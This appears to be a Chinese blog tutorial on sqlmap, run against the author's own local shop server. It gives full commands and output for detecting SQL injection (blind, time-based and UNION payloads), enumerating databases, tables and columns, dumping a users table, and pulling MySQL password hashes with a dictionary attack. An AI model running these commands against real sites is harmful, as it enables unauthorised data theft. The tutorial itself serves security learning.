sqlmap

Sqlmap 是一个开源的渗透测试工具,可以自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多针对最终渗透测试人员的小众功能,以及从数据库指纹、从数据库获取数据、访问底层文件系统和通过带外连接在操作系统上执行命令等广泛的开关。

安装

pip install sqlmap

查看帮助文档

sqlmap -hh

中文文档

https://sqlmap.campfire.ga/

直连数据库

服务型数据库(mysql)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users

文件型数据库(sqlite)

DBMS://DATABASE_FILEPATH

sqlmap -d "sqlite3://D:\apiTestDjango\db.sqlite3" -f --banner --dbs --tables

初级实战

此处使用的是本地的服务,目的在于学习sqlmap的使用,请不要做违法的事情

扫描项目源码为: https://gitee.com/zy7y/uniapp_shop_server

1. 扫描注入点

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1

        ___

       __H__

 ___ ___[,]_____ ___ ___  {1.5.5#pip}

|_ -| . ["]     | .'| . |

|___|_  [.]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:34:37 /2021-05-14/

[13:34:37] [INFO] resuming back-end DBMS 'mysql'

[13:34:37] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[13:34:37] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:34:37 /2021-05-14/

# Title: Generic UNION query (NULL) - 5 columns 注入点

2. 根据注入点查到全部数据库 --dbs

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.5.5#pip}

|_ -| . [']     | .'| . |

|___|_  ["]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:40:12 /2021-05-14/

[13:40:12] [INFO] resuming back-end DBMS 'mysql'

[13:40:12] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[13:40:12] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[13:40:12] [INFO] fetching database names

available databases [6]:

[*] atplant

[*] information_schema

[*] mysql

[*] performance_schema

[*] sys

[*] uniapp_shop

[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:40:12 /2021-05-14/

3. 根据指定数据库来查所有表

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

        ___

       __H__

 ___ ___[.]_____ ___ ___  {1.5.5#pip}

|_ -| . [(]     | .'| . |

|___|_  [,]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:57:46 /2021-05-14/

[14:57:47] [INFO] resuming back-end DBMS 'mysql'

[14:57:47] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[14:57:47] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'

Database: uniapp_shop

[36 tables]

+----------------------------+

| dt_article                 |

| dt_article_albums          |

| dt_article_attach          |

| dt_article_attribute_field |

| dt_article_attribute_value |

| dt_article_category        |

| dt_article_comment         |

| dt_brands                  |

| dt_channel                 |

| dt_channel_field           |

| dt_channel_site            |

| dt_express                 |

| dt_feedback                |

| dt_link                    |

| dt_mail_template           |

| dt_manager                 |

| dt_manager_log             |

| dt_manager_role            |

| dt_manager_role_value      |

| dt_navigation              |

| dt_order_goods             |

| dt_orders                  |

| dt_payment                 |

| dt_sms_template            |

| dt_user_amount_log         |

| dt_user_attach_log         |

| dt_user_code               |

| dt_user_group_price        |

| dt_user_groups             |

| dt_user_login_log          |

| dt_user_message            |

| dt_user_oauth              |

| dt_user_oauth_app          |

| dt_user_point_log          |

| dt_user_recharge           |

| dt_users                   |

+----------------------------+

[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:57:47 /2021-05-14/

3.根据表来爆字段(mysql版本>5.0)

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

        ___

       __H__

 ___ ___[)]_____ ___ ___  {1.5.5#pip}

|_ -| . [)]     | .'| . |

|___|_  ["]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:59:01 /2021-05-14/

[14:59:01] [INFO] resuming back-end DBMS 'mysql'

[14:59:01] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[14:59:01] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'

Database: uniapp_shop

Table: dt_users

[22 columns]

+-----------+--------------+

| Column    | Type         |

+-----------+--------------+

| exp       | int          |

| address   | varchar(255) |

| amount    | double       |

| area      | varchar(255) |

| avatar    | varchar(255) |

| birthday  | timestamp    |

| email     | varchar(50)  |

| group_id  | int          |

| id        | int          |

| mobile    | varchar(20)  |

| msn       | varchar(100) |

| nick_name | varchar(100) |

| password  | varchar(100) |

| point     | int          |

| qq        | varchar(20)  |

| reg_ip    | varchar(20)  |

| reg_time  | timestamp    |

| salt      | varchar(20)  |

| sex       | varchar(20)  |

| status    | int          |

| telphone  | varchar(50)  |

| user_name | varchar(100) |

+-----------+--------------+

[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:59:02 /2021-05-14/

4. 根据字段名查到表中的数据

注意:当使用了--dump 已经触法了法律,请不要恶意攻击他人服务

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.5.5#pip}

|_ -| . [)]     | .'| . |

|___|_  [']_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:03:52 /2021-05-14/

[15:03:52] [INFO] resuming back-end DBMS 'mysql'

[15:03:52] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[15:03:52] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'

Database: uniapp_shop

Table: dt_users

[1 entry]

+-----------+----+

| user_name | id |

+-----------+----+

| test      | 1  |

+-----------+----+

[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'

[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 15:03:53 /2021-05-14/

5. 获取当前数据库用户及hash密码

命令: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

        ___

       __H__

 ___ ___[(]_____ ___ ___  {1.5.5#pip}

|_ -| . [']     | .'| . |

|___|_  [(]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:40:02 /2021-05-14/

[14:40:02] [INFO] resuming back-end DBMS 'mysql'

[14:40:02] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[14:40:02] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:40:02] [INFO] fetching database users password hashes

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y

do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y

[14:40:05] [WARNING] no clear password(s) found

database management system users password hashes:

[*] develop [1]:

    password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD

[*] mysql.infoschema [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] mysql.session [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] mysql.sys [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] root [2]:

    password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC

    password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3

[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:40:05 /2021-05-14/

最后

请不要恶意使用其来攻击他人服务,不要触碰法律,高级用法请查看官方文档

参考资料

sqlmap中文文档

sql注入实战讲解

SQL注入:Sqlmap初体验的更多相关文章

  1. Spring JDBCTemplate连接SQL Server之初体验

    前言 在没有任何框架的帮助下我们操作数据库都是用jdbc,耗时耗力,那么有了Spring,我们则不用重复造轮子了,先来试试Spring JDBC增删改查,其中关键就是构造JdbcTemplate类. ...

  2. SQL注入--SQLMap过WAF

    单引号被过滤情况: 空格.等号未被过滤情况: select被过滤情况: 以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤. 比如空格被过滤可以使用space2com ...

  3. 一次对真实网站的SQL注入———SQLmap使用

    网上有许多手工注入SQL的例子和语句,非常值得我们学习,手工注入能让我们更加理解网站和数据库的关系,也能明白为什么利用注入语句能发现网站漏洞. 因为我是新手,注入语句还不太熟悉,我这次是手注发现的注点 ...

  4. Saturday SQL Server 2016 初体验

    最近在开发一个有关数据库的项目,我想用SQLite,但是SQLite的设计器不是特别友好,然后据说VS有一个集成的SQLite设计器,但是我用的VS2017亲测并没有,用户体验不佳,所以安装一个SQL ...

  5. 普通SQL注入

    安全防御:过滤/转义非法参数,屏蔽SQL查询错误. 工具:Firefox,hackbar,sqlmap,burpsuite 1.联想tms站 例1, 联想tms站fromCity参数存在普通SQL注入 ...

  6. SQL注入(dvwa环境)

    首先登录DVWA主页: 1.修改安全级别为LOW级(第一次玩别打脸),如图中DVWA Security页面中. 2.进入SQL Injection页面,出错了.(心里想着这DVWA是官网下的不至于玩不 ...

  7. 2017-2018-2 20179204《网络攻防实践》第十一周学习总结 SQL注入攻击与实践

    第1节 研究缓冲区溢出的原理,至少针对两种数据库进行差异化研究 1.1 原理 在计算机内部,输入数据通常被存放在一个临时空间内,这个临时存放的空间就被称为缓冲区,缓冲区的长度事先已经被程序或者操作系统 ...

  8. sql注入知识点

    需找sql注入点1\无特定目标inurl:.php?id= 2\有特定目标:inurl:.php?id= site:target.com 3\工具爬取spider,对搜索引擎和目标网站的链接进行爬取 ...

  9. 防止sql注入和sqlmap介绍

    sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...

随机推荐

  1. CSS水平布局

    1 <!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 <meta charset="U ...

  2. 050_Servlet详解

    目录 Servlet Servlet简介 HelloServlet Servlet原理 servlet-mapping Servlet请求路径 ServletContext Servlet上下文 Se ...

  3. Envoy 部署类型

    目录 Envoy 网络拓扑及请求流程 1. 术语 2. 网络拓扑 3. 配置 4. 更高层的架构 5. 请求流程 1. Listener TCP 接收 2. 侦听器过滤器链和网络过滤器链匹配 3.TL ...

  4. c++ 反汇编 构造函数和析构函数

    构造函数和析构函数出现的时机 局部对象 109: // 局部对象定义调用构造函数 110: 111: CNumber Number; 00C8A37D 8D 4D EC lea ecx,[Number ...

  5. LevelDB 源码解析之 Arena

    GitHub: https://github.com/storagezhang Emai: debugzhang@163.com 华为云社区: https://bbs.huaweicloud.com/ ...

  6. OpenCV图像处理中“投影技术”的使用

           本文区分"问题引出"."概念抽象"."算法实现"三个部分由表及里具体讲解OpenCV图像处理中"投影技术" ...

  7. 【linux】驱动-6-总线-设备-驱动

    目录 前言 6. 总线-设备-驱动 6.1 概念 6.2 工作原理 6.3 总线 6.3.1 总线介绍 6.3.2 注册总线 6.4 设备 6.4.1 设备介绍 6.4.2 设备注册.注销 6.5 驱 ...

  8. vue 快速入门 系列

    vue 快速入门(未完结,持续更新中...) 前言 为什么要学习 vue 现在主流的框架 vue.angular 和 react 都是声明式操作 DOM 的框架.所谓声明式,就是我们只需要描述状态与 ...

  9. 深入Spring Security魔幻山谷-获取认证机制核心原理讲解(新版)

    文/朱季谦 本文基于Springboot+Vue+Spring Security框架而写的原创学习笔记,demo代码参考<Spring Boot+Spring Cloud+Vue+Element ...

  10. arthas使用

    博客原地址:https://blog.csdn.net/u013076044/article/details/83626202 arthas使用 文章目录 准备 启动Demo 进入arthas控制台 ...